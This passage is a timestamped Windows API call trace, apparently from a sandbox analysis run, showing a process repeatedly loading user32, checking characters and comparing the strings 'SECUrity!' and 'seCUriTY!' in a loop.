[0013.208] IsCharLowerA (ch=65) returned 0 [0013.208] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=66) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=67) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=68) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=69) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=70) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=71) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=72) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=73) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=74) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=75) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=76) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=77) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.209] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.209] IsCharLowerA (ch=78) returned 0 [0013.209] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=79) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=80) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=81) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=82) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=83) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=84) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=85) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=86) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=87) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=88) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=89) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=65) returned 0 [0013.210] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.210] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.210] IsCharLowerA (ch=66) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] IsCharLowerA (ch=67) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] IsCharLowerA (ch=68) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] IsCharLowerA (ch=69) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] IsCharLowerA (ch=70) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] IsCharLowerA (ch=71) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.211] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.211] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.211] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.211] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.211] IsCharLowerA (ch=65) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] IsCharLowerA (ch=66) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] IsCharLowerA (ch=67) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.211] IsCharLowerA (ch=68) returned 0 [0013.211] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.211] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=69) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=70) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=71) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=72) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=73) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=74) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=75) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=76) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=77) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=78) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=79) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=80) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.212] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.212] IsCharLowerA (ch=81) returned 0 [0013.212] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=82) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=83) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=84) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=85) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=86) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=87) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=88) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=89) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=65) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=66) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=67) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=68) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.213] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.213] IsCharLowerA (ch=69) returned 0 [0013.213] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=70) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=71) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.214] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.214] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.214] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.214] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.214] IsCharLowerA (ch=65) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=66) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=67) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=68) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=69) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=70) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=71) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.214] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.214] IsCharLowerA (ch=72) returned 0 [0013.214] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=73) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=74) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=75) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=76) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=77) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=78) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=79) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=80) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=81) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=82) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=83) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.215] IsCharLowerA (ch=84) returned 0 [0013.215] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.215] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=85) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=86) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=87) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=88) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=89) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=65) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=66) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=67) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=68) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=69) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=70) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] IsCharLowerA (ch=71) returned 0 [0013.216] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.216] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.216] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.216] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.217] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.217] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.217] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.217] IsCharLowerA (ch=65) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=66) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=67) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=68) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=69) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=70) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=71) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=72) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=73) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=74) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.217] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.217] IsCharLowerA (ch=75) returned 0 [0013.217] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=76) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=77) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=78) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=79) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=80) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=81) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=82) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=83) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=84) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=85) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=86) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=87) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.218] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.218] IsCharLowerA (ch=88) returned 0 [0013.218] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.219] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.219] IsCharLowerA (ch=89) returned 0 [0013.219] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.219] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.219] IsCharLowerA (ch=65) returned 0 [0013.219] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.219] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.219] IsCharLowerA (ch=66) returned 0 [0013.219] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.219] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.219] IsCharLowerA (ch=67) returned 0 [0013.219] IsCharAlphaNumericW (ch=0x34) returned 1 [0013.219] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=68) returned 0 [0013.224] IsCharAlphaNumericW (ch=0x35) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=69) returned 0 [0013.224] IsCharAlphaNumericW (ch=0x36) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=70) returned 0 [0013.224] IsCharAlphaNumericW (ch=0x37) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=71) returned 0 [0013.224] IsCharAlphaNumericW (ch=0x38) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.224] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.224] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.224] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.224] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.224] IsCharLowerA (ch=65) returned 0 [0013.224] IsCharAlphaNumericW (ch=0x31) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=66) returned 0 [0013.224] IsCharAlphaNumericW (ch=0x32) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=67) returned 0 [0013.224] IsCharAlphaNumericW (ch=0x33) returned 1 [0013.224] GetProcAddress (hModule=0x765b0000, lpProcName="lstrcmpiA") returned 0x765c3e8e [0013.224] IsCharLowerA (ch=68) returned 0 [0013.224] IsCharAlphaNumericW 